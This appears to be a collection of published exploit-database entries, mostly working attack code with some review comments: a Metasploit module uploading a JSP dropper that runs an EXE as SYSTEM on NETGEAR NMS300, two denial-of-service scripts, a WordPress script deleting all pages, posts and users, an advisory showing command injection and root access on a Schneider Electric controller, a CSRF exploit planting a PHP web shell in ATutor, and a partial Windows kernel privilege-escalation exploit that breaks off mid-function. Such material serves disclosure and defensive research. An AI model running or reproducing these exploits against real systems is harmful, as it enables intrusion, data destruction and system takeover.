  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::EXE

  # Module metadata and options (RPORT defaults to the NMS300 web port 8080).
  def initialize(info = {})
    super(update_info(info,
      'Name'        => 'NETGEAR ProSafe Network Management System 300 Arbitrary File Upload',
      'Description' => %q{
        Netgear's ProSafe NMS300 is a network management utility that runs on Windows systems.
        The application has a file upload vulnerability that can be exploited by an
        unauthenticated remote attacker to execute code as the SYSTEM user.
        Two servlets are vulnerable, FileUploadController (located at
        /lib-1.0/external/flash/fileUpload.do) and FileUpload2Controller (located at /fileUpload.do).
        This module exploits the latter, and has been tested with versions 1.5.0.2, 1.4.0.17 and
        1.1.0.13.
      },
      'Author' =>
        [
          'Pedro Ribeiro <pedrib[at]gmail.com>' # Vulnerability discovery and updated MSF module
        ],
      'License' => MSF_LICENSE,
      'References' =>
        [
          ['CVE', '2016-1525'],
          ['US-CERT-VU', '777024'],
          ['URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/advisories/netgear_nms_rce.txt'],
          ['URL', 'http://seclists.org/fulldisclosure/2016/Feb/30']
        ],
      'DefaultOptions' => { 'WfsDelay' => 5 },
      'Platform' => 'win',
      'Arch' => ARCH_X86,
      'Privileged' => true,
      'Targets' =>
        [
          [ 'NETGEAR ProSafe Network Management System 300 / Windows', {} ]
        ],
      'DefaultTarget' => 0,
      'DisclosureDate' => 'Feb 4 2016'))

    register_options(
      [
        Opt::RPORT(8080),
        OptString.new('TARGETURI', [true,  "Application path", '/'])
      ], self.class)
  end


  # Passive check: a GET to fileUpload.do is answered with 405 (method not
  # allowed) when the upload servlet is mapped. That only proves the endpoint
  # exists -- nothing about the version is verified -- so the result is
  # Detected rather than Vulnerable.
  def check
    res = send_request_cgi({
      'uri'    => normalize_uri(datastore['TARGETURI'], 'fileUpload.do'),
      'method' => 'GET'
    })
    if res && res.code == 405
      Exploit::CheckCode::Detected
    else
      Exploit::CheckCode::Safe
    end
  end


  # Builds a JSP dropper: the payload EXE is embedded as a base64 string,
  # decoded on the server, written to a temp file and executed with
  # Runtime.exec. Variable names are randomised to avoid static signatures.
  #
  # NOTE(review): sun.misc.BASE64Decoder is a JDK-internal class that was
  # removed in Java 9; this works only because NMS300 bundles an older JRE --
  # confirm on newer builds.
  # NOTE(review): var_tmp and var_proc2 both use the 'e' prefix, so a
  # (very unlikely) identical random suffix would produce a duplicate
  # variable and a JSP compile error.
  # NOTE(review): the catch-all swallows every exception, so a failed write
  # or exec gives no feedback; the temp .exe is also never deleted.
  def generate_jsp_payload
    exe = generate_payload_exe
    base64_exe = Rex::Text.encode_base64(exe)
    payload_name = rand_text_alpha(rand(6)+3)

    var_raw     = 'a' + rand_text_alpha(rand(8) + 3)
    var_ostream = 'b' + rand_text_alpha(rand(8) + 3)
    var_buf     = 'c' + rand_text_alpha(rand(8) + 3)
    var_decoder = 'd' + rand_text_alpha(rand(8) + 3)
    var_tmp     = 'e' + rand_text_alpha(rand(8) + 3)
    var_path    = 'f' + rand_text_alpha(rand(8) + 3)
    var_proc2   = 'e' + rand_text_alpha(rand(8) + 3)

    jsp = %Q|
    <%@page import="java.io.*"%>
    <%@page import="sun.misc.BASE64Decoder"%>
    <%
    try {
      String #{var_buf} = "#{base64_exe}";
      BASE64Decoder #{var_decoder} = new BASE64Decoder();
      byte[] #{var_raw} = #{var_decoder}.decodeBuffer(#{var_buf}.toString());

      File #{var_tmp} = File.createTempFile("#{payload_name}", ".exe");
      String #{var_path} = #{var_tmp}.getAbsolutePath();

      BufferedOutputStream #{var_ostream} =
        new BufferedOutputStream(new FileOutputStream(#{var_path}));
      #{var_ostream}.write(#{var_raw});
      #{var_ostream}.close();
      Process #{var_proc2} = Runtime.getRuntime().exec(#{var_path});
    } catch (Exception e) {
    }
    %>
    |

    # Collapse to a single line; whitespace is irrelevant to the JSP compiler.
    jsp.gsub!(/[\n\t\r]/, '')

    return jsp
  end


  # Uploads the JSP via the unauthenticated servlet, then requests it so the
  # server compiles and runs it, and finally waits for the payload session.
  #
  # NOTE(review): the servlet evidently stores the file as "null<name>.jsp"
  # (looks like a Java null concatenated onto the name) while reporting
  # "<name>.jsp" in its JSON reply -- inferred from the two names used
  # below; confirm against the advisory/target.
  # NOTE(review): FileDropper is not included, so the uploaded JSP (and the
  # temp .exe it writes) are left on the target after exploitation.
  def exploit
    jsp_payload = generate_jsp_payload

    jsp_name = Rex::Text.rand_text_alpha(8+rand(8))
    jsp_full_name = "null#{jsp_name}.jsp"
    post_data = Rex::MIME::Message.new
    post_data.add_part(jsp_name, nil, nil, 'form-data; name="name"')
    post_data.add_part(jsp_payload,
      "application/octet-stream", 'binary',
      "form-data; name=\"Filedata\"; filename=\"#{Rex::Text.rand_text_alpha(6+rand(10))}.jsp\"")
    data = post_data.to_s

    print_status("#{peer} - Uploading payload...")
    res = send_request_cgi({
      'uri'    => normalize_uri(datastore['TARGETURI'], 'fileUpload.do'),
      'method' => 'POST',
      'data'   => data,
      'ctype'  => "multipart/form-data; boundary=#{post_data.bound}"
    })
    # Success is a 200 with the servlet's JSON echoing back the chosen name.
    if res && res.code == 200 && res.body.to_s =~ /{"success":true, "file":"#{jsp_name}.jsp"}/
      print_status("#{peer} - Payload uploaded successfully")
    else
      fail_with(Failure::Unknown, "#{peer} - Payload upload failed")
    end

    print_status("#{peer} - Executing payload...")
    # The GET response is not inspected; the session callback is the signal.
    send_request_cgi({
      'uri'    => normalize_uri(datastore['TARGETURI'], jsp_full_name),
      'method' => 'GET'
    })
    handler
  end
end
            
# Exploit Title: Quick Tftp Server Pro 2.3 TFTP mode Remote Overflow (DoS)
# Date: 21/01/2016
# Exploit Author: Guillaume Kaddouch
#   Twitter: @gkweb76
#   Blog: https://networkfilter.blogspot.com
#   GitHub: https://github.com/gkweb76/exploits
# Vendor Homepage: http://www.tallsoft.com/tftpserver.htm
# Software Link: http://www.tallsoft.com/tftpserver_setup.exe
# Version: 2.3
# Tested on: Windows 7 Family x64 (FR)
# Category: DoS

"""
Disclosure Timeline:
--------------------
2016-01-21: Vulnerability discovered
2016-01-24: Vendor contacted
2016-01-29: Vendor contacted again (no answer)
2016-03-01: Vulnerability published 
 
Description :
-------------
A remote overflow exists in Quick Tftp Server Pro 2.3 in the TFTP mode field when handling a TFTP Read Request (RRQ). Since TFTP
has no authentication, an unauthenticated remote attacker can crash the application with a single UDP datagram, causing a Denial of Service.

 
Instructions:
-------------
- Start Quick Tftp Server Pro 2.3
- Run this exploit locally or from your remote attacking machine
"""

import socket

# Lab target used by the author; replace before use against another test host.
host    = "192.168.135.132"
port    = 69                    # UDP port of the TFTP service (RFC 1350 default)

# An RRQ packet is: opcode | filename | NUL | mode | NUL (RFC 1350).
# The mode field is normally a short keyword such as "octet" or "netascii";
# here it is replaced by 1024 bytes of 'A', which is what trips the overflow.
# Defender's note: a mode field this long is a protocol anomaly that an IDS
# can flag, and the server-side fix is to bound the field before copying it.
request = "\x00\x01"    # TFTP Read Request (RRQ)
file    = "file.txt"
mode    = '\x41' * 1024 # Overflow

# NOTE: `file` and `buffer` shadow Python 2 builtins; harmless in a flat script.
buffer  = request + file + "\x00" + mode + "\x00"

try:
        # UDP: a single datagram is sent and nothing is read back, so the
        # script cannot tell whether the server actually crashed.
        s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)

        print "[*] Sending buffer to %s (%d bytes)..." % (host, len(buffer))
        s.sendto(buffer, (host, port))
        s.close()
        print "[*] Done."
except:
        # Bare except: any failure (including KeyboardInterrupt) is reported
        # as a connection error even though UDP performs no connection.
        print "[-] Error connecting"
            
# Exploit Title: Freeproxy Internet Suite 4.10 Remote DoS
# Date: 01/03/2016
# Exploit Author: Guillaume Kaddouch
#   Twitter: @gkweb76
#   Blog: https://networkfilter.blogspot.com
#   GitHub: https://github.com/gkweb76/exploits
# Vendor Homepage: http://www.handcraftedsoftware.org/
# Software Link: http://www.handcraftedsoftware.org/index.php?page=download&op=getFile&id=2&title=FreeProxy-Internet-Suite
# Version: 4.10.1751
# Tested on: Windows 7 Family x64 (FR)
# Category: DoS

"""
Disclosure Timeline:
--------------------
2016-01-29: Vulnerability discovered
2016-01-30: Vendor contacted
2016-03-01: Vulnerability published 

 
Description :
-------------
A remote Denial Of Service exists in Freeproxy Internet Suite 4.10.1751 when sending a GET request to the proxy with an overly long URL. 
 

Instructions:
-------------
- Start Freeproxy Internet Suite
- Run this exploit locally or from your remote attacking machine. Multiple sends may be necessary to crash the application.
"""

import socket

# Lab target used by the author; replace before use against another test host.
host    = "192.168.135.132"
port    = 8080                  # proxy listener port

junk    = '\x41' * 5000         # oversized path segment that triggers the DoS

# Absolute-form proxy request (GET http://...) with the 5000-byte segment in
# the URL path. Defender's note: a URL this long in a proxy request is an
# easy anomaly to alert on; the fix is to enforce a maximum request-line length.
buffer  = "GET http://::../%s/index.html HTTP/1.1\r\n" % junk
buffer += "Host: www.google.fr\r\n"
buffer += "User-Agent: Mozilla/5.0 (X11; Linux i686; rv:14.0) Gecko/20100101 Firefox/14.0.1\r\n"
buffer += "\r\n\r\n"

try:
    print "[*] Connecting to %s:%d" % (host, port)
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

    # The status line reports len(junk), not len(buffer); the headers add a few more bytes.
    print "[*] Sending buffer %d bytes..." % len(junk)
    s.connect((host, port))
    # send() may write fewer bytes than requested; the return value is not checked
    # (sendall would be the usual choice). No response is read.
    s.send(buffer)
    s.close()

    print "[*] Done."
except:
    # Bare except: every failure, including a refused connection or a
    # KeyboardInterrupt, is reported with the same message.
    print "[-] Error connecting"
            
# Exploit Title: PictureTrail Photo Editor GE.exe 2.00 - ./bmp Crash PoC
# Date: 01-03-2016
# Exploit Author: redknight99
# Vendor Homepage: http://www.picturetrail.com/
# Software Link: http://www.picturetrail.com/downloads/photoeditor200.exe
# Version: 2.0.0
# Tested on: Windows 7, 10
# CVE : Unknown

Picture Trail Photo editor fails to properly parse .bmp header height and width values. 
Negative height and width values cause a program crash (memory corruption) and SEH corruption. Remote code execution may be possible.


Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39518.zip
            
Source: https://github.com/Cr4sh/secretnet_expl

Secret Net 7 and Secret Net Studio 8 local privileges escalation exploit.

0day vulnerabilities in the sncc0.sys kernel driver of Security Code products allow an attacker to perform local privilege escalation from Guest to Local System. Also, an attacker that has access to any Windows system may manually install sncc0.sys (which has a valid digital signature from Security Code) and exploit its vulnerability to bypass DSE and load unsigned kernel mode drivers on Windows x64 platforms.

For detailed vulnerability analysis and explanation of how sncc0_00220010_expl code works please read Windows DSE bypass part of my article "Exploiting SMM callout vulnerabilities in Lenovo firmware".

This exploit was tested with 64-bit versions of Windows 7, 8, 8.1 and 10. On SMEP enabled systems you have to manually restore original value of CR4 register to avoid PatchGuard bugchecks, for real life usage example please check my fwexpl project.


Proof of Concept:
https://github.com/Cr4sh/secretnet_expl/archive/master.zip
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39520.zip
            
'''
* Exploit Title: WordPress Bulk Delete Plugin [Privilege Escalation]
* Discovery Date: 2016-02-10
* Exploit Author: Panagiotis Vagenas
* Author Link: https://twitter.com/panVagenas
* Vendor Homepage: http://bulkwp.com/
* Software Link: https://wordpress.org/plugins/bulk-delete/
* Version: 5.5.3
* Tested on: WordPress 4.4.2
* Category: WebApps, WordPress


Description
-----------

_Bulk Delete_ plugin for WordPress suffers from a privilege escalation
vulnerability. Any registered user can exploit the lack of capabilities
checks to perform all administrative tasks provided by the _Bulk Delete_
plugin. Some of these actions, but not all, are:

- `bd_delete_pages_by_status`: deletes all pages by status
- `bd_delete_posts_by_post_type`: deletes all posts by type
- `bd_delete_users_by_meta`: delete all users with a specific pair of
meta name, meta value

Nearly all actions registered by this plugin can be performed by any
user, as long as they are passed in a query var named `bd_action` and the
user has a valid account. These actions would normally require
administrative rights, so we can consider this a privilege
escalation vulnerability.

PoC
---

The following script will delete all pages, posts and users from the
vulnerable website.
'''

#!/usr/bin/python3

################################################################################
# Bulk Delete Privilege Escalation Exploit
#
# **IMPORTANT** Don't use this in a production site, if vulnerable it will
# delete nearly all your sites content
#
# Author: Panagiotis Vagenas <pan.vagenas@gmail.com>
################################################################################

import requests

# Placeholder site; both URLs point at the WordPress install under test.
loginUrl = 'http://example.com/wp-login.php'
adminUrl = 'http://example.com/wp-admin/index.php'

# Standard wp-login.php form fields. Any valid account works, because the
# vulnerable plugin performs no capability check on its bd_action handlers
# (see the description above).
loginPostData = {
    'log': 'username',
    'pwd': 'password',
    'rememberme': 'forever',
    'wp-submit': 'Log+In'
}

# Note: no timeout is set on this request.
l = requests.post(loginUrl, data=loginPostData)

# The session cookies are read from the first response in the redirect
# history (l.history[0]), not from the final 200 page; a missing history
# or an empty cookie jar means the login did not succeed.
if l.status_code != 200 or len(l.history) == 0 or len(l.history[0].cookies) == 0:
    print("Couldn't acquire a valid session")
    exit(1)

loggedInCookies = l.history[0].cookies

def do_action(action, data):
    """POST one Bulk Delete action to wp-admin as the logged-in low-privilege user.

    action: plugin action name, sent as the `bd_action` query var.
    data:   form fields that action expects, sent as the request body.
    Returns nothing. The HTTP response is not inspected, so "performed" only
    means the request completed, not that the plugin accepted it.
    """
    try:
        requests.post(
            adminUrl + '?bd_action=' + action,
            data=data,
            cookies=loggedInCookies,
            timeout=30
        )
    # NOTE(review): requests reports a timeout as requests.exceptions.Timeout,
    # which is not a subclass of the builtin TimeoutError, so this handler most
    # likely never fires and a timeout propagates as an uncaught exception —
    # confirm against the requests version in use.
    except TimeoutError:
        print('Action ' + action + ' timed out')
    else:
        print('Action ' + action + ' performed')

# Each call below is destructive (see the IMPORTANT note in the header).
# The smbd_* field names are the plugin's own form fields for each action.
print('Deleting all pages')
do_action(
    'delete_pages_by_status',
    {
        'smbd_pages_force_delete': 'true',
        'smbd_published_pages': 'published_pages',
        'smbd_draft_pages': 'draft_pages',
        'smbd_pending_pages': 'pending_pages',
        'smbd_future_pages': 'future_pages',
        'smbd_private_pages': 'private_pages',
    }
)

# 'smbd_types[]' is sent as a repeated form field, one value per post type.
print('Deleting all posts from all default post types')
do_action('delete_posts_by_post_type', {'smbd_types[]': [
    'post',
    'page',
    'attachment',
    'revision',
    'nav_menu_item'
]})

# An empty meta value with a LIKE comparison matches every user that has a
# 'nickname' meta key.
print('Deleting all users')
do_action(
    'delete_users_by_meta',
    {
        'smbd_u_meta_key': 'nickname',
        'smbd_u_meta_compare': 'LIKE',
        'smbd_u_meta_value': '',
    }
)

exit(0)


'''
Solution
--------

Upgrade to v5.5.4

Timeline
--------

1. **2016-02-10**: Requested CVE ID
2. **2016-02-10**: Vendor notified through wordpress.org support forums
3. **2016-02-10**: Vendor notified through the contact form at bulkwp.com
4. **2016-02-10**: Vendor responded and received details about the issue
5. **2016-02-10**: Vendor verified vulnerability
6. **2016-02-13**: Vendor released v5.5.4 which resolves this issue
'''
            
*# Exploit Title: [*Schneider Electric SBO / AS Multiple Vulnerabilities]
# Discovered by: Karn Ganeshen
# Vendor Homepage: [www.schneider-electric.com*] *
*# Versions Reported: [*
Automation Server Series (AS, AS-P), v1.7 and prior
*] *
# CVE-ID: [CVE-2016-2278]

About
Schneider Electric’s corporate headquarters is located in Paris, France,
and it maintains offices in more than 100 countries worldwide.

The affected product, Automation Server, is a building automation system
for small and medium-sized buildings. According to Schneider Electric,
Automation Server is deployed in the Commercial Facilities sector.
Schneider Electric estimates that this product is used worldwide.

*Vulnerabilities*
*1. Weak credential management*
CVE-ID: None [ Mitre, CVE? ]

There are two primary users:
a. root - password is not set by default - this is a problem as we will see
later in the vuln findings
- By default, root cannot SSH in.
b. admin - default password is 'admin'
- Anyone can remotely ssh in to the device using default admin/admin login.

The system / application allows a) weak creds to start with, and more
importantly, b) vulnerable versions lack a mechanism to force the user
to change the initial password on first use or later. This has been
fixed in the latest version.

*2. OS Command Injection*
*CVE-ID*: CVE-2016-2278
*https://ics-cert.us-cert.gov/advisories/ICSA-16-061-01
<https://ics-cert.us-cert.gov/advisories/ICSA-16-061-01>*

After logging in to the device over SSH, the 'admin' user - the only
active, administrative user at this point - is provided a restricted shell
(msh), which offers a small set of, application- specific functional
options.

$ ssh <IP> -l admin
Password:

Welcome! (use 'help' to list commands)
admin@box:>

admin@box:> *release*
NAME=SE2Linux
ID=se2linux
PRETTY_NAME=SE2Linux (Schneider Electric Embedded Linux)
VERSION_ID=0.2.0.212

admin@box:>

admin@box:> help
usage: help [command]
Type 'help [command]' for help on a specific command.

Available commands:
exit - exit this session
ps - report a snapshot of the current processes readlog - read log files
reboot - reboot the system
setip - configure the network interface
setlog - configure the logging
setsnmp - configure the snmp service
setsecurity - configure the security
settime - configure the system time
top - display Linux tasks
uptime - tell how long the system has been running release - tell the os
release details

Attempting to run any different command will give an error message.

However, this restricted shell functionality (msh) can be bypassed to
execute underlying system commands, by appending '| <command>' to any of
the above set of commands:

admin@box:> *uptime | ls*
bin home lost+found root sys config include mnt run tmp dev lib opt sbin usr
etc localization proc share var

At this point, basically you have full (indirect) control over the server.

admin@box:> *uptime | cat /etc/passwd *

root:x:0:0:root:/:/bin/sh
daemon:x:2:2:daemon:/sbin:/bin/false
messagebus:x:3:3:messagebus:/sbin:/bin/false
ntp:x:102:102:ntp:/var/empty/ntp:/bin/false
sshd:x:103:103:sshd:/var/empty:/bin/false
app:x:500:500:Linux Application:/:/bin/false
admin:x:1000:1000:Linux User,,,:/:/bin/msh

admin@box:> uptime | cat /etc/group
root:x:0:
wheel:x:1:admin
daemon:x:2:
messagebus:x:3:
adm:x:5:admin
power:x:20:app
serial:x:21:app
cio:x:22:app
lon:x:23:app
daemonsv:x:30:admin,app
utmp:x:100:
lock:x:101:
ntp:x:102:
sshd:x:103:
app:x:500:admin
admin:x:1000:admin

*3. Privilege Escalation / access to superuser 'root'*
CVE-ID: None [ Mitre, CVE? ]

Since this is an administrative user, an attacker can exploit OS command
injection to perform a variety of tasks from msh shell. But isn’t it better
to get a root shell instead.!

As observed from Issue 1 above, root does not have a password set, and it
is possible to use 'sudo -i' and become root.

*Note*: sudo is not presented / offered to 'admin' in the set of functional
options available through msh. It is required for tech guys / legit admins /
SBO admins to manage the AS system and related functionality. Assumption
from SE team is, a low-skilled attacker / regular, unsophisticated,
non-technical user will not be able to figure it out. If someone does
figure it out, he/she will be responsible enough not to go evil.

admin@box:> *sudo -i*

We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:

#1) Respect the privacy of others.
#2) Think before you type.
#3) With great power comes great responsibility.

Password:

root@box:~> cat /etc/shadow
root:!:16650:0:99999:7:::
sshd:!:1:0:99999:7:::
admin:$6$<hash>:16652:0:99999:7:::

+++++
-- 
Best Regards,
Karn Ganeshen
            
/* exp.js

ATutor LMS <= 2.2.1 install_modules.php CSRF Remote Code Execution
by mr_me

Notes:
``````
- Discovered for @ipn_mx students advanced php vuln/dev class
- Tested on the latest FireFox 44.0.2 release build
- This poc simply uploads a zip file as pwn/si.php with a "<?php system($_GET['cmd']); ?>" in it
- You will need to set the Access-Control-Allow-Origin header to allow the target to pull zips
- Use this with your favorite XSS attack
- Student proof, aka bullet proof

Timeline:
`````````
23/02/2016 - notified vendor via info[at]atutor[dot]ca
24/02/2016 - requested CVE and assigned CVE-2016-2539
24/02/2016 - vendor replied stating they are investigating the issue
05/03/2016 - vendor patches the issue (https://github.com/atutor/ATutor/commit/bfc6c80c6c217c5515172f3cc949e13dfa1a92ac)
06/03/2016 - coordinated public release

Example: 
````````
mr_me@jupiter:~$ cat poc.py 
#!/usr/bin/python

import sys
import zipfile
import BaseHTTPServer
from cStringIO import StringIO
from SimpleHTTPServer import SimpleHTTPRequestHandler

if len(sys.argv) < 3:
    print "Usage: %s <lport> <target>" % sys.argv[0]
    print "eg: %s 8000 172.16.69.128" % sys.argv[0]
    sys.exit(1)

def _build_zip():
    """
    builds the zip file
    """
    f = StringIO()
    z = zipfile.ZipFile(f, 'w', zipfile.ZIP_DEFLATED)
    z.writestr('pwn/si.php', "<?php system($_GET['cmd']); ?>")
    z.close()
    handle = open('pwn.zip','wb')
    handle.write(f.getvalue())
    handle.close

class CORSRequestHandler (SimpleHTTPRequestHandler):
    def end_headers (self):
        self.send_header('Access-Control-Allow-Origin', 'http://%s' % sys.argv[2])
        SimpleHTTPRequestHandler.end_headers(self)

if __name__ == '__main__':
    _build_zip()
    BaseHTTPServer.test(CORSRequestHandler, BaseHTTPServer.HTTPServer)

mr_me@jupiter:~$ ./poc.py 8000 172.16.69.128
Serving HTTP on 0.0.0.0 port 8000 ...
172.16.69.1 - - [23/Feb/2016 14:04:07] "GET /exp.js HTTP/1.1" 200 -
172.16.69.1 - - [23/Feb/2016 14:04:07] "GET /pwn.zip HTTP/1.1" 200 -

~ de Mexico con amor,

*/

// Return "hostname:port" for a URL, letting the browser's anchor element do the parsing.
// The port part is empty when the URL carries no explicit port.
var get_hostname = function(href) {
    var anchor = document.createElement("a");
    anchor.href = href;
    var parts = [anchor.hostname, anchor.port];
    return parts.join(":");
};

// Upload file_data as a multipart "modulefile" form post to url, then request
// the dropped file once the upload completes. This rides on the victim's
// ambient session (a CSRF); the vendor commit referenced in the header is the fix.
//   url       - the install_modules.php endpoint on the target
//   file_data - zip contents as a binary string (from FileReader.readAsBinaryString)
//   filename  - filename to present in the multipart part
// Always returns true; the result of the upload is never inspected.
function trolololol(url, file_data, filename) {
   var file_size = file_data.length,
   boundary = "828116593165207937691721278",
   xhr = new XMLHttpRequest();

   // latest ff doesnt have sendAsBinary(), so we redefine it
   // Each char of the binary string becomes one byte, so the zip survives
   // the transfer unchanged.
   if(!xhr.sendAsBinary){
      xhr.sendAsBinary = function(datastr) {
          function byteValue(x) {
              return x.charCodeAt(0) & 0xff;
          }
          var ords = Array.prototype.map.call(datastr, byteValue);
          var ui8a = new Uint8Array(ords);
          this.send(ui8a.buffer);
      }
   }
   
   // the callback after this stage is done...
   // Rebinds the outer xhr to a fresh request once the upload finishes.
   xhr.onreadystatechange = function() {
       if (xhr.readyState == XMLHttpRequest.DONE) {
           xhr = new XMLHttpRequest();
           // change this if you change the zip
           xhr.open("GET", "/ATutor/mods/pwn/si.php?cmd=id", true);
           xhr.send();
       }
   }

   xhr.open("POST", url, true);
   // simulate a file MIME POST request.
   // NOTE(review): the boundary is separated with a comma rather than the usual
   // semicolon; the server's parser evidently tolerates it.
   xhr.setRequestHeader("Content-Type", "multipart/form-data, boundary="+boundary);
   // NOTE(review): Content-Length is a forbidden request header for XHR, so
   // browsers most likely ignore this call; file_size is also the zip length,
   // not the length of the multipart body built below.
   xhr.setRequestHeader("Content-Length", file_size);
   var body = "--" + boundary + "\r\n";
   body += 'Content-Disposition: form-data; name="modulefile"; filename="' + filename + '"\r\n';
   body += "Content-Type: archive/zip\r\n\r\n";
   body += file_data + "\r\n";
   body += "--" + boundary + "\r\n";
   body += 'Content-Disposition: form-data; name="install_upload"\r\n\r\n';
   body += "junk\r\n";
   body += "--" + boundary;
   xhr.sendAsBinary(body);
   return true;
}

// Fetch pwn.zip from the host that served this script, then hand it to
// trolololol() for upload. The cross-origin fetch only succeeds because the
// serving side sets Access-Control-Allow-Origin for the target (see poc.py
// in the header comment).
function pwn(){
    var xhr = new XMLHttpRequest();
    // et phone home
    // Assumes this script is the first <script> on the page.
    var home = get_hostname(document.scripts[0].src);
    // get our own zip file
    xhr.open('GET', 'http://' + home + '/pwn.zip', true);
    xhr.responseType = 'blob';
    xhr.onload = function(e) {
        if (this.status == 200) {
            // use the FileReader class to get the raw binary
            var reader = new window.FileReader();
            reader.readAsBinaryString(new Blob([this.response], {type: 'application/zip'})); 
            reader.onloadend = function() {
                trolololol("/ATutor/mods/_core/modules/install_modules.php", reader.result, "pwn.zip");
            }
        }
    };
    xhr.send();
}

pwn();
            
# Exploit Title: MS14-040 - AFD.SYS Dangling Pointer
# Date: 2016-03-03
# Exploit Author: Rick Larabee
# Vendor Homepage: www.microsoft.com
# Version: Windows 7, 64 bit
# Tested on: Win7 x64
#        afd.sys - 6.1.7601.17514
#        ntdll.dll - 6.1.7601.17514 
#
# CVE : CVE-2014-1767
# Category: Local Privilege Escalation
# References:
#   http://www.siberas.de/papers/Pwn2Own_2014_AFD.sys_privilege_escalation.pdf
#   http://ricklarabee.blogspot.com/
#   https://warroom.securestate.com/ms14-040-afd-sys-dangling-pointer-further-analysis/
#   https://technet.microsoft.com/en-us/library/security/ms14-040.aspx
#   http://www.cvedetails.com/cve/CVE-2014-1767/
#   https://github.com/zeroSteiner/mayhem/blob/master/mayhem/exploit/
#
# Greetz: PWN4GEPWN1E, SecurityMook


from ctypes import *
import socket, time, os, struct, sys
from ctypes.wintypes import HANDLE, DWORD
import platform

# Native libraries used throughout (Windows only).
kernel32 = windll.kernel32
ntdll    = windll.ntdll
Psapi    = windll.Psapi

MEMRES     = (0x1000 | 0x2000)    # MEM_COMMIT | MEM_RESERVE
PAGEEXE    = 0x40                 # PAGE_EXECUTE_READWRITE
Zerobits   = c_int(0)             # not referenced below
RegionSize = c_ulonglong(0x1000)  # one page; shared by every NtAllocateVirtualMemory call
written    = c_ulonglong(0)       # bytes-written out-param shared by every WriteProcessMemory call

FakeObjSize = 0x100               # size of the fake object built in CreateFakeObject

GENERIC_READ = 0x80000000
GENERIC_WRITE = 0x40000000
GENERIC_EXECUTE = 0x20000000
GENERIC_ALL = 0x10000000
INVALID_HANDLE_VALUE = -1 

# Winsock is bound directly (rather than via the socket module) so the raw
# SOCKET handle can be passed to ZwDeviceIoControlFile in main().
WSAGetLastError          = windll.Ws2_32.WSAGetLastError
WSAGetLastError.argtypes = ()
WSAGetLastError.restype  = c_int
SOCKET                   = c_int
WSASocket                = windll.Ws2_32.WSASocketA
WSASocket.argtypes       = (c_int, c_int, c_int, c_void_p, c_uint, DWORD)
WSASocket.restype        = SOCKET
closesocket              = windll.Ws2_32.closesocket
closesocket.argtypes     = (SOCKET,)
closesocket.restype      = c_int
connect                  = windll.Ws2_32.connect
connect.argtypes         = (SOCKET, c_void_p, c_int)
connect.restype          = c_int
# Module-level placeholder only; main() binds a local of the same name
# to the value returned by get_haldispatchtable().
HalDispatchTable         = c_uint64   

# IPv4 socket address in the Winsock layout, passed by reference to connect().
class sockaddr_in(Structure):
    _fields_ = [
        ("sin_family", c_short),
        ("sin_port", c_ushort),     # network byte order (see socket.htons in main)
        ("sin_addr", c_ulong),      # network byte order (see socket.htonl in main)
        ("sin_zero", c_char * 8),
        ]   

# 64-bit-wide argument types so addresses are passed intact instead of
# being truncated to ctypes' default int width.
kernel32.WriteProcessMemory.argtypes = [c_ulonglong, c_ulonglong, c_char_p,  c_ulonglong, POINTER(c_ulonglong)]        
ntdll.NtAllocateVirtualMemory.argtypes = [c_ulonglong, POINTER(c_ulonglong), c_ulonglong, POINTER(c_ulonglong),c_ulonglong,c_ulonglong]

def find_driver_base(driver=None):
	"""Return (base_address, name) for a loaded kernel module, or None.

	driver: lower-case module name to look for (e.g. "hal.dll"). When None,
	the first module whose name contains "krnl" (the kernel image) is returned.
	"""
	#https://github.com/zeroSteiner/mayhem/blob/master/mayhem/exploit/windows.py
	
	if platform.architecture()[0] == '64bit':
		lpImageBase = (c_ulonglong * 1024)()
		lpcbNeeded = c_longlong()
		Psapi.GetDeviceDriverBaseNameA.argtypes = [c_longlong, POINTER(c_char), c_uint32]
	else:
		#if process_is_wow64():
		#	raise RuntimeError('python running in WOW64 is not supported')
		lpImageBase = (c_ulong * 1024)()
		lpcbNeeded = c_long()
	driver_name_size = c_long()
	driver_name_size.value = 48
	# NOTE(review): EnumDeviceDrivers' second argument is the size of the
	# array in bytes, so 1024 fills only the first 128 of the 1024 64-bit
	# entries; lpcbNeeded is never compared against it. Works here because
	# the kernel and hal.dll are enumerated early, but confirm.
	Psapi.EnumDeviceDrivers(byref(lpImageBase), c_int(1024), byref(lpcbNeeded))
	for base_addr in lpImageBase:
		driver_name = c_char_p('\x00' * driver_name_size.value)
		if base_addr:
			Psapi.GetDeviceDriverBaseNameA(base_addr, driver_name, driver_name_size.value)
			if driver == None and driver_name.value.lower().find("krnl") != -1:
				return (base_addr, driver_name.value)
			elif driver_name.value.lower() == driver:
				return (base_addr, driver_name.value)
	return None		

def get_haldispatchtable():
    #https://github.com/zeroSteiner/mayhem/blob/master/mayhem/exploit/windows.py

	"""Return the kernel-mode address of nt!HalDispatchTable.

	The kernel image is loaded into this process as a plain library
	(LoadLibraryExA with flags=1, DONT_RESOLVE_DLL_REFERENCES), the export's
	offset from that user-mode base is taken, and the offset is rebased onto
	the real kernel base reported by find_driver_base(). Only the 64-bit
	path sets the wide ctypes signatures.
	"""
	if platform.architecture()[0] == '64bit':
		kernel32.LoadLibraryExA.restype = c_uint64
		kernel32.GetProcAddress.argtypes = [c_uint64, POINTER(c_char)]
		kernel32.GetProcAddress.restype = c_uint64
	(krnlbase, kernelver) = find_driver_base()
	hKernel = kernel32.LoadLibraryExA(kernelver, 0, 1)
	halDispatchTable = kernel32.GetProcAddress(hKernel, 'HalDispatchTable')
	halDispatchTable -= hKernel
	halDispatchTable += krnlbase
	return halDispatchTable

    
def CreateBuffer1(inbuf1addr):
    """Write the 0x40-byte input buffer for IOCTL 0x1207F (AfdTransmitFile) at inbuf1addr.

    The buffer carries a user-mode address (virtualAddress) and an MDL size
    derived from it and targetsize; the constants follow the siberas paper
    referenced in the header. The page is mapped first with
    NtAllocateVirtualMemory. Neither native call's status (dwStatus,
    wpmStatus) is checked, so a failed allocation or write goes unnoticed.
    """
    print "[+] Creating Buffer for IOCTL 0x1207F (afdTransmitFile) at: ", hex(inbuf1addr)
    inbuf1size = 0x40
    targetsize = 0x100
    virtualAddress = 0x13371337
